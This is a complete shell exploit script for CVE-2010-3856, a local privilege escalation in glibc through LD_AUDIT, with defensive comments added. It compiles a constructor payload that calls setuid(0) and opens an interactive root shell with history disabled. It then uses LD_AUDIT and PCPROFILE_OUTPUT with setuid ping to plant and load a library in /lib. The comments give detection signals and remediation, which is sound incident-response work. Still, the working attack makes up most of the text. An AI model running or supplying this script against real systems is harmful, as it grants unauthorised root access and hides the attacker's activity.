- -----------------------------------------------------------
- glibc.sh file on 62.152.104.149; an exploit script for CVE-2010-3856 (glibc LD_AUDIT local privilege escalation, see the link below)
- http://packetstormsecurity.org/files/106817/glibc-LD_AUDIT-Privilege-Escalation.html
- -----------------------------------------------------------
- #!/bin/sh
# Defensive reading of this sample: a local privilege-escalation script that
# the page header labels CVE-2010-3856. It sets LD_AUDIT (and
# PCPROFILE_OUTPUT) in the environment of `ping`, which is presumably
# setuid root on the affected host -- confirm on the system under review.
# Remediation is the vendor glibc update for that CVE; everything below is
# annotated for detection and incident-response purposes.
#
# Artefacts named in the script: /tmp/payload.c, /tmp/exploit,
# /lib/libexploit.so. All three are deleted during a successful run, so
# leftover files are unreliable evidence; process/exec auditing that
# records the environment of setuid programs is the better signal.

# umask 0: files created later in the run get no permission bits masked
# off. The script's own message says the goal is world-writable files.
- echo "[+] Setting umask to 0 so we have world writable files."
- umask 0
- echo "[+] Preparing binary payload."
# Writes C source to a fixed path in /tmp. The function is marked as a
# constructor, so it runs when the shared object is loaded. It unlinks
# /lib/libexploit.so, calls setuid(0) and setgid(0), points HISTFILE at
# /dev/null (no history from the resulting shell) and execs an
# interactive /bin/sh.
- cat > /tmp/payload.c <<_EOF
- void __attribute__((constructor)) init()
- {
- printf("[+] Cleaning up.\n");
- unlink("/lib/libexploit.so");
- printf("[+] Launching shell.\n");
- setuid(0);
- setgid(0);
- setenv("HISTFILE", "/dev/null", 1);
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- _EOF
# Builds the shared object with the host's gcc; -w silences the warnings
# the include-less source would otherwise produce. Unexpected compiler use
# by an unprivileged account is a useful alert, but the absence of a
# compiler is not a mitigation by itself.
- gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
- echo "[+] Writing root owned world readable file in /lib"
# First ping run: LD_AUDIT names libpcprofile.so and PCPROFILE_OUTPUT names
# a path under /lib. Per the message above, the result is a root-owned
# file at /lib/libexploit.so; stderr is discarded. Detection: a setuid
# program executed with LD_AUDIT or PCPROFILE_OUTPUT set, and a new file
# under /lib that no package owns.
- LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null
- echo "[+] Filling the lib file with lib contents."
# Replaces the contents of the file just created with the compiled object.
# This write comes from the unprivileged user, which presumably works only
# because of the earlier umask 0 -- a world-writable file in a trusted
# library directory is itself an indicator.
- cat /tmp/exploit > /lib/libexploit.so
# Removes the build artefacts from /tmp.
- rm /tmp/payload.c /tmp/exploit
- echo "[+] Executing payload."
# Second ping run: LD_AUDIT now names the planted library, so loading it
# triggers the constructor described above. On a glibc carrying the fix for
# CVE-2010-3856 this step is expected to fail -- verify against the
# vendor advisory for the distribution in use.
- LD_AUDIT="libexploit.so" ping